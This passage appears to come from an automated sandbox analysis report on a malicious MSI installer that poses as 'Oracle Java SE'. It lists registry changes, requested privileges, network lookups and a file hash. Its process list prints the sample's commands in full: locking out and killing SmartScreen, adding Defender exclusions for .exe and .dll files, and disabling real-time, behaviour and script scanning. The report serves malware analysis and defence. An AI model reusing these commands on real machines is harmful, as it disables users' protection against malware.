| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84\ProductFeature | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Version = "134217999" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductIcon = "C:\\Windows\\Installer\\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\\Logo.ico" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\PackageName = "4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductName = "Oracle Java SE" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\PackageCode = "9CC889D6EA63DC94DA730B4082DA0DA1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 674D0B963080012894E3DF4CB73C27AF
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 30B3AA91DCE7877DF4C02F3D55173702 E Global\MSI0000
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe
"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"
C:\Windows\syswow64\cmd.exe
"cmd.exe" /C "C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\smartscreen.exe" /a
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /reset
C:\Windows\SysWOW64\taskkill.exe
taskkill /im smartscreen.exe /f
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".dll""
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
Register.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| GB | 2.18.63.21:80 | repository.certum.pl | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.63.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.63.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | websekir.com | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | websekir.com | udp |
| US | 8.8.8.8:53 | websekir.com | udp |
| US | 8.8.8.8:53 | websekir.com | udp |
| N/A | 127.0.0.1:50543 | tcp | |
| N/A | 127.0.0.1:50551 | tcp | |
| N/A | 127.0.0.1:50553 | tcp | |
| N/A | 127.0.0.1:50556 | tcp | |
| US | 8.8.8.8:53 | websekir.com | udp |
| N/A | 127.0.0.1:50559 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6C27B6DA8C60D333DD161137481B772E_8D2705640D941B859369EC71AB80665B
| MD5 | 3d3ac8653b5eeb7eaba019b50df5f3d0 |
| SHA1 | 57dfe18b28a76cfadb4cc80f53d559cf8868728d |
